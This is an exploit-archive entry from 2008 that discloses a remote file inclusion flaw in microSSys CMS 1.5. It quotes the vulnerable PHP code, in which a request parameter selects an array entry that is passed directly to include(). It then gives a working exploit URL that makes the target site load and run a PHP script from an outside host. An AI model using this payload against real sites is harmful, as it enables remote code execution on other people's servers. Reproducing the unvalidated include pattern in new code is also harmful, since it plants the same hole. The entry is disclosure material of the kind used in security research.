microSSys CMS <= 1.5 Remote File Inclusion Vulnerability

2008-05-19T00:00:00
ID 1337DAY-ID-3047
Type zdt
Reporter Raz0r
Modified 2008-05-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
========================================================



## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability
## Software site: http://wajox.com/
## ===============================================================
##                   By Raz0r 
## ===============================================================
## Vulnerable code ([email protected],54-55):
## [22] if(isset($_REQUEST["1"])){
## [23] $P=$_REQUEST["1"];}else{
## [24] $P="main";
## [25] }
## [..]
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}
## [55] @include($PAGES[$P]);
## Nice...
## ===============================================================
## Exploit:
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php
## =============================================================== 



#  0day.today [2018-04-11]  #